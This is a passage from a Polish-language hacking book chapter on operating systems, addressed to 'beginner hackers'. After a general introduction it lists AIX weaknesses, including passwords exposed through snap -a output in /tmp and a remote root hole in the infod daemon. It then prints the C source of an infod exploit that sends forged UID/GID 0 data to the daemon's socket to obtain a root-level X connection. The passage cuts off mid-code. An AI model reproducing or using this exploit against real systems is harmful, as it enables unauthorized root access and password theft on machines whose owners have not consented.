Rozdział 9. ¨ Systemy operacyjne              571

Rozdział 9.
Systemy operacyjne

System operacyjny (operating system, OS) zdefiniować można jako zbiór instrukcji niezbędnych do pracy systemu komputerowego. Jest to najważniejszy element spośród całego stosowanego oprogramowania. System operacyjny zarządza wszystkimi programami, podzespołami i urządzeniami przyłączonymi do komputera. Można wręcz porównać jego rolę do roli urzędu pocztowego — instytucji, która odpowiada za wymianę poczty. Na podobnej zasadzie system operacyjny kieruje przepływem danych wewnątrz systemu komputerowego.

Systemy operacyjne klasyfikuje się, biorąc po uwagę przede wszystkim ich platformy sprzętowe, którymi mogą być superkomputery, komputery mainframe, serwery, stacje robocze, komputery osobiste a nawet palmtopy. System operacyjny decyduje o sposobie zapisywania danych w pamięci masowej, dba o obsługę nazw plików, ich wyszukiwanie i zabezpieczanie. Zarządza również wszystkimi urządzeniami przyłączonymi do jednostki centralnej (patrz rysunek 9.1). Podczas uruchamiania komputera jądro systemu operacyjnego zostaje automatycznie załadowane do pamięci. Po samoczynnej inicjalizacji uruchamiane są kolejne programy. W trakcie ich pracy system operacyjny pozostaje aktywny „w tle”. Najpopularniejsze systemy operacyjne to DOS, Microsoft Windows, MacOS, Linux, SunOS i UNIX.

Hakerzy od dawna badają wszystkie wymienione platformy i wyróżnić można wiele charakterystycznych, wykorzystywanych do przełamywania ich barier ochronnych, technik. W naszym omówieniu wyróżnimy następujące: AIX, BSD, Digital, HP-UX, IRIX, UNIX, Linux, MacOS, Windows, OS/2, SCO, Solaris i VAX/VMS. Rozpoczniemy „od ogółu”, a więc — system UNIX.

UNIX

W różnorodnych odmianach systemu UNIX luk w zabezpieczeniach nie brakuje, tym bardziej, że trudno doszukać się ich pełnej i sprawdzonej dokumentacji (dotyczy to przede wszystkim możliwości wykorzystania znanych luk w innych odmianach systemu i wymaganych do tego modyfikacji). Podstawowe techniki to: przejęcie konta root, przepełnianie bufora, przeciążanie (flooding) oraz różnego rodzaju przejęcia usług.

Podstawową pomocą początkującego hakera będzie lista najistotniejszych poleceń systemu UNIX, którą przytaczamy poniżej.

AIX

System AIX firmy IBM (www.ibm.com) to zintegrowana odmiana UNIX-a dla systemów 32- i 64-bitowych. AIX stosowany jest szeroko na komputerach RS/6000, poczynając od najprostszych serwerów i stacji roboczych, aż po potężne superkomputery, jak na przykład RS/6000 SP. System AIX był pierwszym w swojej klasie, który uzyskał niezależne certyfikaty zabezpieczeń i zapewniał zgodność z mechanizmami C2 i B1 (klasy zabezpieczeń opisane zostały w części 2.). Jego nowy, oparty na WWW, system zarządzania pozwala konfigurować stacje pod kontrolą systemu AIX zdalnie za pośrednictwem Internetu (patrz rysunek 9.2).

Słabe punkty

Ujawnienie haseł

Streszczenie: Polecenie diagnostyczne pozwala odkodować hasła, mimo zastosowania jednokierunkowego algorytmu mieszającego.

Stan po ataku: Ujawnienie haseł.

Podatność: AIX 3x/4x +.

Luka: W przypadkach awarii systemu obsługa korzysta zazwyczaj z wydruku uzyskiwanego poleceniem snap -a. To proste narzędzie diagnostyczne eksportuje dane systemowe (łącznie z hasłami) do katalogu danych tymczasowych. Umożliwia to hakerowi odczytanie haseł z katalogu /tmp/ibmsupt/general/.

Zdalny dostęp do konta root

Streszczenie: Demon infod systemu AIX umożliwia zdalne logowanie na konto root.

Stan po ataku: Nieautoryzowany dostęp na poziomie root.

Podatność: AIX 3x/4x.

Luka: Moduł Info Explorer systemu AIX służy do scentralizowanej obsługi dokumentacji. Nie jest więc przeprowadzane żadne sprawdzenie danych przesyłanych do lokalnego gniazda. Umożliwia to hakerowi wysłanie odpowiednio spreparowanych danych do procesu demona i przekierowanie zainicjowanego już połączenia do własnego okna X. Przesłanie wartości UID i GID równych 0 powinno zmusić demona do utworzenia połączenia z uprawnieniami root. Ilustruje to poniższy program infod.c. Jego autorem jest guru systemu UNIX, Arisme.

infod.c

#include <sys/types.h>

#include <sys/socket.h>

#include <sys/un.h>

#include <netdb.h>

#include <stdio.h>

#include <stdlib.h>

#include <pwd.h>

#define TAILLE_BUFFER 2000

#define SOCK_PATH "/tmp/.info-help"

#define PWD "/tmp"

#define KOPY "Infod AIX exploit (k) Arisme 21/11/98\nAdvisory RSI.0011.11-09-98.
å AIX.INFOD (http://www.repsec.com)"

#define NOUSER "Use : infofun [login]"

#define UNKNOWN "User does not exist !"

#define OK "Waiting for magic window ... if you have problems check the xhost "

void send_environ(char *var,FILE *param)

{ char tempo[TAILLE_BUFFER];

  int taille;

  taille=strlen(var);

  sprintf(tempo,"%c%s%c%c%c",taille,var,0,0,0);

  fwrite(tempo,1,taille+4,param);

}

main(int argc,char** argv)

{ struct sockaddr_un sin,expediteur;

  struct hostent *hp;

  struct passwd *info;

  int chaussette,taille_expediteur,port,taille_struct,taille_param;

  char buffer[TAILLE_BUFFER],paramz[TAILLE_BUFFER],*disp,*pointeur;

  FILE *param;

  char *HOME,*LOGIN;

  int UID,GID;

  printf("\n\n%s\n\n",KOPY);

  if (argc!=2) { printf("%s\n",NOUSER);

                 exit(1); }

  info=getpwnam(argv[1]);

  if (!info)   { printf("%s\n",UNKNOWN);

                 exit(1); }

  HOME=info->pw_dir;

  LOGIN=info->pw_name;

  UID=info->pw_uid;

  GID=info->pw_gid;

  param=fopen("/tmp/tempo.fun","wb");

  chaussette=socket(AF_UNIX,SOCK_STREAM,0);

  sin.sun_family=AF_UNIX;

  strcpy(sin.sun_path,SOCK_PATH);

  taille_struct=sizeof(struct sockaddr_un);

  if (connect(chaussette,(struct sockaddr*)&sin,taille_struct)<0)

     { perror("connect");

       exit(1); }  

  /* 0 0 PF_UID pf_UID 0 0 */

  sprintf(buffer,"%c%c%c%c%c%c",0,0,UID>>8,UID-((UID>>8)*256),0,0);

  fwrite(buffer,1,6,param);

  /* PF_GID pf_GID */

  sprintf(buffer,"%c%c",GID>>8,GID-((GID>>8)*256));

  fwrite(buffer...